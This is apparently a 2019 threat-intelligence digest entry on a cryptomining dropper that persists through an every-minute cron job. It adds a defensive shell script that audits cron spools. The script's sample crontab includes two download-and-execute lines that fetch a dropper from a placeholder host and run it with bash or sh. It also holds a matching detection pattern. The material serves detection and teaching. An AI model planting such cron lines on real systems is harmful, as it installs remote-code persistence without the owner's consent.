Cryptomining Dropper and Cronjob Creator (Jun 19, 2019)
A cryptomining dropper has been reported by Sucuri researchers, who were alerted by an unknown individual who had discovered an unfamiliar process running on their web server. A Bash script on the server downloads the cryptominer to the victim's system; as of this writing, the initial compromise vector is unknown, but it is likely an unpatched vulnerability, brute force, or phishing for admin credentials. The Bash script looks for other cryptomining processes that are already running, kills any it finds, and then downloads the cryptominer. The payload and configuration file are deleted to hide the miner's presence. For persistence, a cron job runs every minute to check for the Bash script, downloading and executing it again if it has been removed. This allows the malware to reinfect the host even after all of the malicious files have been removed.
Recommendation: The cron spool should be checked after any security incident and as part of routine scans, since a malicious cron job can continue to reinfect the system. Cryptocurrency miners cause high CPU usage, so if a machine's fans seem to be running constantly, the activity or task manager should be checked for miners running unnoticed.
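The persistence mechanism described above (an every-minute cron job that re-downloads and re-executes a script) and the recommendation to audit the cron spool can be turned into a simple check. The script below is an added example written for this digest, not code from Sucuri or from the malware report; the spool directory, the user names, the "EXAMPLE-PLACEHOLDER" host and the sample crontab entries are all constructed for the demonstration. It flags crontab lines that combine an every-minute schedule with a download tool whose output is fed to a shell, which is the shape of the reinfection loop the report describes.

```shell
#!/bin/sh
# Cron spool audit for download-and-execute persistence (constructed example).
# Real deployments would point count_suspicious_cron_lines at
# /var/spool/cron/crontabs (Debian) or /var/spool/cron (RHEL) and /etc/cron.d.

# Return 0 (true) if one crontab line matches the persistence pattern:
# every-minute schedule AND a download tool whose result is executed by a shell.
is_suspicious_cron_line() {
  line="$1"
  # Every-minute schedule: five '*' fields, or '*/1' in the minute field.
  printf '%s\n' "$line" \
    | grep -Eq '^[[:space:]]*(\*|\*/1)([[:space:]]+\*){4}[[:space:]]' || return 1
  # curl/wget piped straight into sh/bash, or followed by ';' or '&&' and a shell
  # invocation of the fetched file.
  printf '%s\n' "$line" \
    | grep -Eq '(curl|wget)[^|;&]*(\|[[:space:]]*(ba)?sh|[;&]+[[:space:]]*(ba)?sh[[:space:]])'
}

# Walk every crontab file in a spool directory, report suspicious lines on
# stderr and print the total count on stdout.
count_suspicious_cron_lines() {
  spool_dir="$1"
  count=0
  for f in "$spool_dir"/*; do
    [ -f "$f" ] || continue
    # Redirect instead of piping so the loop runs in this shell and keeps $count.
    while IFS= read -r line || [ -n "$line" ]; do
      case "$line" in
        ''|\#*) continue ;;   # skip blank lines and comments
      esac
      if is_suspicious_cron_line "$line"; then
        echo "SUSPICIOUS: $f: $line" >&2
        count=$((count + 1))
      fi
    done < "$f"
  done
  echo "$count"
}

# Build a constructed sample spool in a temporary directory and print its path.
make_sample_spool() {
  dir="$(mktemp -d)"
  # Benign user crontab: nightly backup and hourly log rotation.
  cat > "$dir/alice" <<'EOF'
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
15 * * * * /usr/sbin/logrotate /etc/logrotate.conf
EOF
  # Constructed entries shaped like the reinfection loop in the report
  # (placeholder host, not a real indicator).
  cat > "$dir/www-data" <<'EOF'
* * * * * curl -fsSL http://EXAMPLE-PLACEHOLDER/dropper.sh | bash >/dev/null 2>&1
*/1 * * * * wget -q -O /tmp/.x http://EXAMPLE-PLACEHOLDER/dropper.sh && sh /tmp/.x
EOF
  echo "$dir"
}

main() {
  spool="$(make_sample_spool)"
  n="$(count_suspicious_cron_lines "$spool")"
  echo "suspicious cron entries: $n"
  rm -rf "$spool"
}

main "$@"
```

On a live host, run the audit as root so that every user's crontab is readable, and treat any hit as a lead rather than a verdict: the regex is deliberately narrow (every-minute schedule plus curl/wget feeding a shell) to keep false positives low, so a job that uses a different fetcher or a longer interval still needs a manual read of the spool.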
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.